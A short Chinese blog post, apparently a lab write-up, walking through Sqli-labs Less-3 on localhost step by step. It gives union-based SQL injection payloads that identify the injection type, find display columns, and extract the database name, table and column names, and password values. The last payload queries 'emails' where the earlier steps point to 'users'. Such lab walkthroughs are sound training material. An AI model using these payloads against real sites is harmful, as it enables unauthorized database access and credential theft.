Sqli-labs 3

hacker_17Z2024-07-11 23:44

1.按照路径http://localhost/sqli-labs/sqli-labs-master/Less-3/进入

2.判断注入类型----字符型

Payload:?id=1') and 1=1--+

注:根据报错提示的语法错误,在第一行中使用接近'union select 1,2,3--')的正确语法

3.判断注入点:2,3

Payload:id=-1') union select 1,2,3 --+

4. 根据注入点查询指定数据库名----security

Payload:id=-1') union select 1,database(),3 --+

5.查询指定数据库名下的表名

Payload:

id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+

6.查询指定表----users下的字段名

Payload:

id=-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+

7.查询指定字段名:password

Payload:

id=-1') union select 1,password,3 from emails--+

相关推荐
kka杰5 分钟前
MYSQL结构操作DDL指令2.表操作
数据库·mysql
曾经的三心草6 分钟前
Mysql
数据库·mysql·oracle
河铃旅鹿6 分钟前
Android开发-java版:SQLite数据库
android·数据库·笔记·学习·sqlite
laplace01237 分钟前
数据库-MySQL-02
数据库·mysql·oracle
百***66178 分钟前
SQL Server 创建用户并授权
数据库·oracle
小许学java8 分钟前
MySQL-触发器
java·数据库·mysql·存储过程·触发器
wangjialelele14 分钟前
详解mysql命令行操作与语言链接
c语言·数据库·c++·mysql·oracle
riderxin14 分钟前
【20251101】mysql基本命令复习
数据库·mysql·oracle
合作小小程序员小小店1 小时前
桌面开发,在线%幼儿教育考试管理%系统,基于eclipse,java,swing,mysql数据库
java·数据库·sql·mysql·eclipse·jdk
c***V3231 小时前
免费的Web安全培训课程,OWASP Top 10
数据库·安全·web安全
热门推荐
01GitHub 镜像站点02UV安装并设置国内源03BongoCat - 跨平台键盘猫动画工具04Linux下V2Ray安装配置指南05安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)06Valdi:Snapchat 开源的新一代跨平台 UI 框架07Labelme从安装到标注:零基础完整指南08综合整理:pdf预览显示:你尝试预览的文件可能对你的计算机有害。如果你信任此文件以及其来源,请打开此文件以看其内容,如何解决以正常预览文件092025 最新教程:注册并切换到美区 Apple ID10jdk21下载、安装(Windows、Linux、macOS)